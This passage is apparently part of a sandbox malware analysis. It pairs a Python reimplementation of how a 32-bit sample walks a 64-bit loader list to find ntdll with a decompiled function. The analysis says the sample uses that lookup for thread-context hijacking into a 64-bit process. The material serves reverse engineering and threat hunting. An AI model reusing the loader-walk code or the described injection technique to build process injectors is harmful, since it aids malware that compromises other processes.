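                dll_base=_u64(entry, ENTRY64_DLL_BASE),
                size_of_image=struct.unpack_from("<I", entry, ENTRY64_SIZE_OF_IMAGE)[0],
                full_name=name))
            flink = _u64(entry, 0)       # InLoadOrderLinks.Flink
    except (ValueError, struct.error):
        pass
    return modules

def find_module64(modules: List[Module64], wanted: str) -> Optional[Tuple[int, int]]:
    """Case-insensitive base-name match, retried with everything from the first
    '.' dropped (the two lstrcmpiA calls around StrChrA in E0040231B)."""
    w = wanted.lower()
    for m in modules:
        base = m.base_name.lower()
        if base == w or base.split(".", 1)[0] == w:
            return m.dll_base, m.size_of_image
    return None

def build_sample_process() -> Tuple[ReadMem, bytes]:
    """A constructed 64-bit address space holding a PEB64, a PEB_LDR_DATA64 and
    three loader entries; paths, bases and sizes are made up for the example."""
    base, mem = 0x7FF6_0000_0000, bytearray(0x8000)
    def put(addr: int, data: bytes) -> None:
        mem[addr - base:addr - base + len(data)] = data
    def read(addr: int, size: int) -> bytes:   # stands in for ZwWow64ReadVirtualMemory64
        off = addr - base
        if off < 0 or off + size > len(mem):
            raise ValueError(f"unreadable {addr:#x}+{size:#x}")
        return bytes(mem[off:off + size])
    peb, ldr, names = base, base + 0x1000, base + 0x6000
    mods = [(r"C:\Users\dev\payload.exe", 0x7FF6_1234_0000, 0x0002_A000),
            (r"C:\Windows\SYSTEM32\ntdll.dll", 0x7FFD_D010_0000, 0x001F_1000),
            (r"C:\Windows\System32\KERNEL32.DLL", 0x7FFD_CE40_0000, 0x000B_6000)]
    head = ldr + LDR64_IN_LOAD_ORDER_LIST
    entries = [base + 0x2000 + i * 0x100 for i in range(len(mods))]
    put(peb + PEB64_LDR, struct.pack("<Q", ldr))
    put(head, struct.pack("<QQ", entries[0], entries[-1]))
    for i, ((path, dll_base, size), ea) in enumerate(zip(mods, entries)):
        enc, nb = path.encode("utf-16-le"), names + i * 0x200
        put(nb, enc)
        e = bytearray(ENTRY64_SIZE)
        struct.pack_into("<QQ", e, 0, entries[i + 1] if i + 1 < len(entries) else head,
                         entries[i - 1] if i else head)
        struct.pack_into("<Q", e, ENTRY64_DLL_BASE, dll_base)
        struct.pack_into("<I", e, ENTRY64_SIZE_OF_IMAGE, size)
        struct.pack_into("<HH", e, ENTRY64_FULL_NAME_LEN, len(enc), len(enc) + 2)
        struct.pack_into("<Q", e, ENTRY64_FULL_NAME_BUF, nb)
        put(ea, bytes(e))
    pbi = bytearray(0x30)                       # PROCESS_BASIC_INFORMATION64
    struct.pack_into("<Q", pbi, PBI64_PEB_BASE, peb)
    return read, bytes(pbi)

def locate_ntdll64() -> Optional[Tuple[int, int]]:
    """What E0040231B hands back to its caller: (DllBase, SizeOfImage) of ntdll."""
    read, pbi = build_sample_process()
    return find_module64(walk_ldr64(read, pbi), "ntdll.dll")
```

On a real WOW64 host the `read` callable would wrap ntdll's ZwWow64ReadVirtualMemory64 and `pbi` would come from ZwWow64QueryInformationProcess64 with ProcessBasicInformation and a 0x30-byte buffer, exactly the two calls the API lists above record; nothing else in the walk is Windows-specific. For hunting, the tell is a 32-bit image resolving those two exports by name through GetProcAddress and then opening another process with write and thread access. The rest of the decompile consumes the returned base: E004012AC resolves LdrLoadDll, LdrGetProcedureAddress and ZwProtectVirtualMemory in that 64-bit ntdll and caches the three 8-byte pointers (the 0x18-byte memcpy), and in E0040203C the 0x4d0-byte zeroed block with 0x100003 at +0x30 is a 64-bit CONTEXT (ContextFlags = CONTEXT_AMD64 | CONTEXT_CONTROL | CONTEXT_INTEGER) whose +0xf8 (Rip) is pointed at the 0x100-byte stub copied from E00402C5D and whose +0x78 (Rax) receives the remote block's address, i.e. thread-context hijacking into a 64-bit process.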
    C-Code - Quality: 41%
    			E0040203C(void* __ecx, intOrPtr __edx, intOrPtr* __esi, void* __eflags, intOrPtr* _a4) {
    				intOrPtr _v984;
    				intOrPtr _v988;
    				signed int _v1112;
    				intOrPtr _v1116;
    				intOrPtr _v1188;
    				void _v1228;
    				int _v1232;
    				char _v1236;
    				char _v1240;
    				intOrPtr _v1248;
    				intOrPtr _v1252;
    				intOrPtr _v1256;
    				intOrPtr _v1260;
    				intOrPtr _t41;
    				char* _t42;
    				long _t50;
    				intOrPtr _t51;
    				intOrPtr* _t59;
    				void* _t61;
    				intOrPtr _t64;
    				intOrPtr* _t66;
    				intOrPtr* _t68;
    
    				_t68 = __esi;
    				_t64 = __edx;
    				_t61 = __ecx;
    				_t59 = _a4;
    				_v1236 = 0;
    				_v1232 = 0;
    				memset( &_v1228, 0, 0x4c8);
    				_t66 = E00401FBB(_t64);
    				_t5 = _t68 + 0x218; // 0x218
    				_v1188 = 0x100003;
    				memcpy(_t5, E00402C5D, 0x100);
    				_t41 = E00402603(_t61,  *_t59);
    				_v1260 = _t41;
    				if(_t41 != 0) {
    					_t42 =  &_v1236;
    					asm("cdq");
    					_push(_t64);
    					_push(_t42);
    					_v1252 = _t42;
    					_v1248 = _t64;
    					asm("cdq");
    					_push(_t64);
    					_push( *((intOrPtr*)(_t59 + 4)));
    					_push(0);
    					_push(2);
    					_push( *((intOrPtr*)(_t66 + 4)));
    					_push( *_t66);
    					if(E00402BF0() >= 0) {
    						_t14 = _t68 + 0x18; // 0x18
    						asm("cdq");
    						if( *((intOrPtr*)(__esi + 0x10)) == _t14 &&  *((intOrPtr*)(__esi + 0x14)) == _t64) {
    							asm("adc ecx, ecx");
    							 *((intOrPtr*)(__esi + 0x10)) = _v1256 + 0x18;
    							 *((intOrPtr*)(__esi + 0x14)) = 0;
    						}
    						 *_t68 = _v988;
    						 *((intOrPtr*)(_t68 + 4)) = _v984;
    						if(E004025C0( *_t59, _v1256, _t68,  &_v1240) == 0) {
    							goto L11;
    						} else {
    							_t51 = _v1256;
    							_push(_v1248);
    							_v1112 = _v1112 & 0x00000000;
    							_push(_v1252);
    							_v1116 = _t51;
    							asm("cdq");
    							_v988 = _t51 + 0x218;
    							_v984 = _t64;
    							asm("cdq");
    							_push(_t64);
    							_push( *((intOrPtr*)(_t59 + 4)));
    							_push(0);
    							_push(2);
    							_push( *((intOrPtr*)(_t66 + 0xc)));
    							_push( *((intOrPtr*)(_t66 + 8)));
    							if(E00402BF0() < 0) {
    								goto L3;
    							} else {
    								_t50 = 0;
    								goto L10;
    							}
    						}
    					} else {
    						L3:
    						_t50 = 5;
    					}
    				} else {
    					_t50 = GetLastError();
    					L10:
    					if(_t50 == 0xffffffff) {
    						L11:
    						_t50 = GetLastError();
    					}
    				}
    				return _t50;
    			}

























    Instruction address column for the decompiled function above (collapsed from the side-by-side view): 0x0040203c to 0x0040218a, with 0x00000000 marking lines that map to no address.

    APIs
    • memset.NTDLL ref: 00402062
    • memcpy.NTDLL ref: 0040208A
      • Part of subcall function 00402603: RtlNtStatusToDosError.NTDLL(00000000), ref: 0040263B
      • Part of subcall function 00402603: SetLastError.KERNEL32(00000000), ref: 00402642
    • GetLastError.KERNEL32(00000010,00000218,00402C5D,00000100,?,00000318,00000008), ref: 004020A1
      • Part of subcall function 004025C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 004025F0
      • Part of subcall function 004025C0: SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004025F7
    • GetLastError.KERNEL32(00000010,?,00000000,?,?,?,?,?,?,?,?,00000010,00000218,00402C5D,00000100), ref: 0040217F
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd

    Executed Functions

    Memory Dump Source
    • Source File: 00000004.00000003.22307780551.03410000.00000010.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_3_3410000_iexplore.jbxd

    Non-executed Functions